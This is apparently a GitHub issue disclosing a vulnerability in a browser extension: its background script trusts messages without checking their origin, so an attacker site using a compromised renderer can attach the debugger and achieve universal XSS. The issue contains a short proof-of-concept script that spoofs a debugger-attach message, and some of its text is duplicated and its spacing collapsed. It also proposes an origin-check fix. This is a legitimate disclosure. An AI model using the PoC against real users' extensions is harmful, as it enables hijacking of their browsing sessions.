You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Click the extension icon (Attack 2) or run the provided code as the content script context (Attack 1).
chrome.storage.local.get(null,e=>{// Leak current TabIdfor(letitemine){// appId is set by the attacker websiteif(!e[item].includes(appId.innerText))continuetabId=item.split('-')[0];}// No ideaattach='[\"DebugStateChange\",\"tabId\",'+tabId+',\"newState\",\"start-debugging\"]';chrome.runtime.sendMessage(JSON.stringify({to: 'background',from: 'debuggerPanel',type: 'debugStateChange',body: attach}));});
This could be fixed by checking MessageSender.origin comes from the extension origin before attaching the debugger as compromised renderers shouldn’t be able to spoof the MessageSender.url, nor MessageSender.origin as seen by a recipient of a chrome.runtime.sendMessage. See also MessageSender documentation and content script security guidance. https://chromium.googlesource.com/chromium/src/+/master/docs/security/compromised-renderers.md#Messaging
The text was updated successfully, but these errors were encountered:
Attack 1: An attacker controlled website can gain access to the powerful extension debugger API that allows for a UXSS without user approval by abusing a compromised renderer. (This is a site isolation issue see https://microsoftedge.github.io/edgevr/posts/deep-dive-into-site-isolation-part-2/#abusing-extensions-to-bypass-site-isolation or https://ndevtk.github.io/writeups/2023/08/18/extensions/)
Attack 2: Its not clear clicking the extension icon may give a remote server permission to all websites not just the trusted localhost debug server over a secure connection. (WAI?)
Repo steps:
This could be fixed by checking
MessageSender.origin
comes from the extension origin before attaching the debugger as compromised renderers shouldn’t be able to spoof theMessageSender.url
, norMessageSender.origin
as seen by a recipient of a chrome.runtime.sendMessage. See also MessageSender documentation and content script security guidance. https://chromium.googlesource.com/chromium/src/+/master/docs/security/compromised-renderers.md#MessagingThe text was updated successfully, but these errors were encountered: